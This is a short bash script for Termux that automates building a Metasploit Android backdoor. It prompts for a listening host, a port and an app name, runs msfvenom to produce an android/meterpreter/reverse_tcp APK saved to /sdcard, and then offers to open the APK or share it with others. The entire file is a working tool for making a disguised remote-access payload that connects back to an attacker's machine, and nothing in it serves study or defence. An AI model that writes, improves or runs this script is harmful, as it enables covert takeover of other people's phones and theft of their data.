#!/data/data/com.termux/files/usr/bin/bash

if [ ! -d "/data/data/com.termux/files/usr/opt/metasploit-framework" ]; then
echo -e '\033[1;91m[!] Metasploit-framework not found.\033[0m'
echo
exit
fi

if [ -d "/data/data/com.termux/files/usr/opt/metasploit-framework" ]; then

#banner
clear
echo -e "\e[1;3$(( $RANDOM * 6 / 32767 + 1 ))m
┏━┳━┳━━┳┓ ┏┳━┳━┳┳━┳━┳━┓
┃┃┃┃┃━━┫┗┳┛┃┳┫┃┃┃┃┃┃┃┃┃
┃┃┃┃┣━━┣┓┃┏┫┻┫┃┃┃┃┃┃┃┃┃
┗┻━┻┻━━┛┗━┛┗━┻┻━┻━┻┻━┻┛
\e[1;3$(( $RANDOM * 6 / 32767 + 1 ))m▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
\e[0m"
printf '\033[1;92m[!] Choose your lhost: '
read lhost
printf '\033[1;92m[!] Choose your lport: '
read lport
echo
printf '\033[1;92m[!] Choose your app name: '
read app
echo -e '\033[0m\033[1;93m'
msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R > /sdcard/$app.apk
echo
echo -e '\033[0m\033[1m[√] Payload Saved Dir : emulated/0/'
echo
printf '\033[1;92m[?] Are you want to Open/Send this payload ? [O/S/n] '
read ask
if [[ $ask = "o" ]] || [[ $ask = "O" ]]
        then cd /sdcard && xdg-open $app.apk
elif [[ $ask = "s" ]] || [[ $ask = "S" ]]
        then cd /sdcard && xdg-open --send $app.apk
else echo 'Abort.'
echo
exit
fi

sleep 2
echo
printf '\033[1;92m[?] Are you want to delete this payload ? [Y/n] '
read ask
if [[ $ask = "y" ]] || [[ $ask = "Y" ]]
        then cd /sdcard && rm $app.apk
echo -e '\033[1;92m[\033[0m-\033[1;92m] Deleted.'
echo
exit
else echo 'Abort.'
echo
fi
fi
